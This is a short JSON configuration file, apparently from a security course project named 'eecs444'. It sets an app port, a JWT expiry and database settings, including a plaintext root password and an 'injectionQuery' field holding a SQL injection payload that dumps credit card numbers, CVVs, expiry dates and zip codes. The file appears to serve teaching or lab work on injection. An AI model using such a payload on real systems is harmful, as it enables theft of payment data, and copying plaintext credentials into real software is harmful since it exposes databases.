{
    "app": {
        "port": 3001
    },

    "jwt": {
        "expiresIn": "1h"
    },

    "db": {
        "name": "eecs444",
        "username": "root",
        "password": "g42wry1ky9l",
        "injectionQuery": "';select concat('number: ', number, '<br/>cvv: ', cvv, '<br/>expdate: ', expmonth, '/', expyear, '<br/>zip: ', zip) as alias from creditcards where number <> '"
    }
}